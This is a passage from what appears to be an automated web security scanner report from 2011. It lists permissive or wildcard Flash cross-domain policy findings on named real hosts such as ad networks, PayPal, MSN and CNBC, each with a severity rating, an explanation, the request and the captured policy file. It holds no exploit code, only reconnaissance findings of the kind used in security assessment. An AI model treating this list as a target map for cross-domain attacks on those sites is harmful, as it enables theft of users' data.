<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.70. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 14:56:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "32883cc-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

4.71. http://tf.nexac.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tf.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tf.nexac.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.72. http://ttwbs.channelintelligence.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ttwbs.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ttwbs.channelintelligence.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:39 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 441
content-type: application/xml
Age: 61
Via: 1.1 iad061108 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.73. http://wingateweb.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wingateweb.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wingateweb.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:54 GMT
Server: Omniture DC/2.0.0
xserver: www125
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.74. http://ad.wsod.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 17:05:46 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "447038-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

4.75. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

4.76. http://ads.adsonar.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adsonar.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:44 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=896
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

4.77. http://ads1.msn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads1.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Date: Tue, 06 Sep 2011 15:00:14 GMT
Content-Length: 616
Content-Type: text/xml
Last-Modified: Thu, 12 May 2011 21:35:14 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Expires: Sat, 30 Jun 2012 12:49:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="global.msads.net" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.msnbc.msn.com" />
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn-int.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-int.com" secure="false" />
...[SNIP]...

4.78. http://adx.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adx.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=ISO-8859-1
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Tue, 06 Sep 2011 17:05:55 GMT
Expires: Wed, 07 Sep 2011 17:05:55 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.79. http://assets1.csc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://assets1.csc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: assets1.csc.com

Response

HTTP/1.0 200 OK
x-amz-id-2: FcnyXqPak36cLwKPUi1HA56iJfWYFNUtUM95uLnVRd/JmKoOs3CeXukpfMrEdpbc
x-amz-request-id: 9A44AC709A32B889
Date: Tue, 06 Sep 2011 15:57:47 GMT
Last-Modified: Thu, 03 Jun 2010 19:56:13 GMT
ETag: "31616154d66e52c8a5f79d34e7fa229a"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 256
Server: AmazonS3
X-Cache: Miss from cloudfront
X-Amz-Cf-Id: ee9cad8e5f3b5b709b20cb0f6ea0020c8921721e47f4c95b539bdba55cfb09358c2ee8f9cae47b93,41028218a4b1860c2975b885931132835d738f7494f9734ced53465bad11a658a47fd29a3b9917d4
Via: 1.0 db26aad8eddbf74ac3abe77abd5de63f.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.csc.com" />
<allow-access-
...[SNIP]...

4.80. http://blogs.oracle.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: blogs.oracle.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Last-Modified: Sat, 16 Jul 2011 10:06:38 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=214587153+0;age=2083326;ecid=51608497101082732,0:1)
Content-Length: 392
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-onl
...[SNIP]...
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.sun.com"/>
...[SNIP]...

4.81. http://bstats.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bstats.adbrite.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 06 Sep 2011 15:32:13 GMT

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

4.82. http://channelsun.sun.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://channelsun.sun.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: channelsun.sun.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"872-1302718369000"
Last-Modified: Wed, 13 Apr 2011 18:12:49 GMT
Content-Type: application/xml
Content-Length: 872
Date: Tue, 06 Sep 2011 16:13:10 GMT

<cross-domain-policy>
<allow-access-from domain="*.oracle.com"/>
<allow-access-from domain="oracle.com"/>
<allow-access-from domain="www.oracle.com"/>
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="www.oracleimg.com"/>
<allow-access-from domain="medianetwork.oracle.com"/>
<allow-access-from domain="*.akamai.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.83. https://cms.paypal.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cms.paypal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cms.paypal.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 10 Jun 2008 20:10:41 GMT
Accept-Ranges: bytes
Content-Length: 312
Content-Type: application/xml
Expires: Tue, 06 Sep 2011 17:06:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 17:06:25 GMT
Connection: close
Set-Cookie: BIGipServerpool_cms.paypal.com_443=455494154.26702.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.paypal.com" />
<allow-access-from domain="*.ebay.com" />
<allow-access-from domain="*.paypalobjects.com" />
...[SNIP]...

4.84. http://cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: cnbc.com
Proxy-Connection: keep-alive
Referer: http://media.cnbc.com/i/CNBC/Components/Promos/_app/promoBox_auto.swf?delay=0&config=24596694&v=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315339052241; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856/site/14081545/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: Keep-Alive
Date: Tue, 06 Sep 2011 14:57:41 GMT
Age: 2384
Content-Length: 3839

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.85. http://cvs.shoplocal.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cvs.shoplocal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cvs.shoplocal.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 12 Aug 2011 18:31:01 GMT
Accept-Ranges: bytes
ETag: "7b77bcfc1d59cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Content-Length: 5330
Date: Tue, 06 Sep 2011 17:06:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
